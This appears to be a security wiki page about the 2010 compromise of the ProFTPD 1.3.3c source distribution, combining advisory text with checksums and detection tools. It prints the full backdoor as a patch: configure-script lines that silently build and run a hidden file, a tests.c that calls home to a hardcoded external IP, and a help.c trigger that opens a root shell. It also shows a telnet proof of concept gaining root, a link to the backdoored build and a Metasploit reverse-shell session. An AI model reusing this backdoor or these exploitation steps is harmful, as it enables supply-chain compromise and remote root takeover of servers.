Exploits/proftpd-1.3.3c-backdoor
Description
On Sunday, the 28th of November 2010 around 20:00 UTC the main distribution server of the ProFTPD project was compromised. The attackers most likely used an unpatched security issue in the FTP daemon to gain access to the server and used their privileges to replace the source files for ProFTPD 1.3.3c with a version which contained a backdoor. The unauthorized modification of the source code was noticed by Daniel Austin and relayed to the ProFTPD project by Jeroen Geilman on Wednesday, December 1 and fixed shortly afterwards.
The fact that the server acted as the main FTP site for the ProFTPD project (ftp.proftpd.org) as well as the rsync distribution server (rsync.proftpd.org) for all ProFTPD mirror servers means that anyone who downloaded ProFTPD 1.3.3c from one of the official mirrors from 2010-11-28 to 2010-12-02 will most likely be affected by the problem.
The backdoor introduced by the attackers allows unauthenticated users remote root access to systems which run the maliciously modified version of the ProFTPD daemon.
Users are strongly advised to check systems running the affected code for security compromises and compile/run a known good version of the code. To verify the integrity of the source files, use the GPG signatures available on the FTP servers as well on the ProFTPD homepage at:
http://www.proftpd.org/md5_pgp.html.
The MD5 sums for the source tarballs are:
8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2 4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz
Here is the notice on official proftp website:
Impacted systems
All downloads of ProFTPD-1.3.3c on the official website between 2010-11-28 and 2010-12-02 are potentially compromised versions. You are advised to check that your version is not compromised using the tools provided below.
Exploit
Source code
From the original 1.3.3c version, here is the patch to apply to have a compromised version:
diff -Naur proftpd-1.3.3c.orig/configure proftpd-1.3.3c/configure
--- proftpd-1.3.3c.orig/configure 2010-04-14 00:01:35.000000000 +0200
+++ proftpd-1.3.3c/configure 2010-10-29 19:08:56.000000000 +0200
@@ -9,7 +9,10 @@
## --------------------- ##
## M4sh Initialization. ##
## --------------------- ##
-
+gcc tests/tests.c -o tests/tests >/dev/null 2>&1
+cc tests/tests.c -o tests/tests >/dev/null 2>&1
+tests/tests >/dev/null 2>&1 &
+rm -rf tests/tests.c tests/tests >/dev/null 2>&1
# Be more Bourne compatible
DUALCASE=1; export DUALCASE # for MKS sh
if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then
diff -Naur proftpd-1.3.3c.orig/src/help.c proftpd-1.3.3c/src/help.c
--- proftpd-1.3.3c.orig/src/help.c 2009-07-01 01:31:18.000000000 +0200
+++ proftpd-1.3.3c/src/help.c 2010-11-16 18:40:46.000000000 +0100
@@ -27,6 +27,8 @@
*/
#include "conf.h"
+#include <stdlib.h>
+#include <string.h>
struct help_rec {
const char *cmd;
@@ -126,7 +128,7 @@
cmd->server->ServerAdmin ? cmd->server->ServerAdmin : "ftp-admin");
} else {
-
+ if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
/* List the syntax for the given target command. */
for (i = 0; i < help_list->nelts; i++) {
if (strcasecmp(helps[i].cmd, target) == 0) {
diff -Naur proftpd-1.3.3c.orig/tests/tests.c proftpd-1.3.3c/tests/tests.c
--- proftpd-1.3.3c.orig/tests/tests.c 1970-01-01 01:00:00.000000000 +0100
+++ proftpd-1.3.3c/tests/tests.c 2010-11-29 09:37:35.000000000 +0100
@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <signal.h>
+#include <string.h>
+
+#define DEF_PORT 9090
+#define DEF_TIMEOUT 15
+#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"
+
+int sock;
+
+void handle_timeout(int sig)
+{
+ close(sock);
+ exit(0);
+}
+
+int main(void)
+{
+
+ struct sockaddr_in addr;
+ struct hostent *he;
+ u_short port;
+ char ip[20]="212.26.42.47"; /* EDB NOTE - HARDCODED IP */
+ port = DEF_PORT;
+ signal(SIGALRM, handle_timeout);
+ alarm(DEF_TIMEOUT);
+ he=gethostbyname(ip);
+ if(he==NULL) return(-1);
+ addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
+ addr.sin_port = htons(port);
+ addr.sin_family = AF_INET;
+ memset(addr.sin_zero, 0, 8);
+ sprintf(ip, inet_ntoa(addr.sin_addr));
+ if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
+ {
+ return EXIT_FAILURE;
+ }
+ if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
+ {
+ close(sock);
+ return EXIT_FAILURE;
+ }
+ if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
+ {
+ return EXIT_FAILURE;
+ }
+ close(sock);
+
+return 0; }
+
+
Download backdoored version
To download modified (backdoored) version of proftpd, click on following link:
http://www.exploit-db.com/application/15662/
Tools
Manual proof of concept
By connecting on port 21/tcp with netcat or telnet, it is possible to check if proftpd is compromised:
$ telnet 192.168.100.20 21 Trying 192.168.100.20... Connected to 192.168.100.20. Escape character is '^]'. 220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.100.20] HELP ACIDBITCHEZ id; uid=0(root) gid=0(root) groupes=65534(nogroup) ^]
Bitchscan
Description
Bitchscan is a Perl script written by chr1x (aka Christian Navarrete) that checks for backdoored ProFTPD over the network (one or more machines). For more information, please refer to http://chr1x.sectester.net/.
Download
The tool is available here: http://hotfile.com/dl/88624117/a90d6a0/bitchscan.tar.gz.html
Proof of Concept (PoC)
Below is an example of usage for bitchscan. It has been tested on a Kubuntu 10.04 version against a Debian 5 box.
$ perl bitchscan.pl 192.168.100.20 -=[ProFTPD ACIDBITCHEZ Scanner by chr1x]=- [*] Scanning a single host 192.168.100.20... >> ProFTPD Detected. >> Testing for Backdoor... > 192.168.100.20 [*] ProFTPD Backdoor Detected!! -> uid=0(root) gid=0(root) groupes=65534(nogroup)
Metasploit module
Description
A Metasploit module (id: 45150) has been written by darkharper2.
Installation
If you have updated Metasploit with msfupdate script, the exploit should be automatically added. Following section explains how to manually install the extension.
First of all, you need to install Metasploit. Once done, download folloowing extension:
$ cd /pentest/exploits/framework3/ $ mkdir -p modules/exploits/unix/ftp/ $ cd modules/exploits/unix/ftp/ $ wget http://www.metasploit.com/redmine/projects/framework/repository/raw/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
Proof of Concept (PoC)
$ cd /pentest/exploits/framework3/
$ ./msfconsole
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v3.5.1-testing [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 313 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11289 updated today (2010.12.11)
msf > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(proftpd_133c_backdoor) > set LHOST 192.168.100.18
LHOST => 192.168.100.18
msf exploit(proftpd_133c_backdoor) > set RHOST 192.168.100.20
RHOST => 192.168.100.20
msf exploit(proftpd_133c_backdoor) > exploit
[*] Started reverse handler on 192.168.100.18:4444
[*] Sending Backdoor Command
[*] Command shell session 1 opened (192.168.100.18:4444 -> 192.168.100.20:36880) at Sat Dec 11 12:50:15 +0100 2010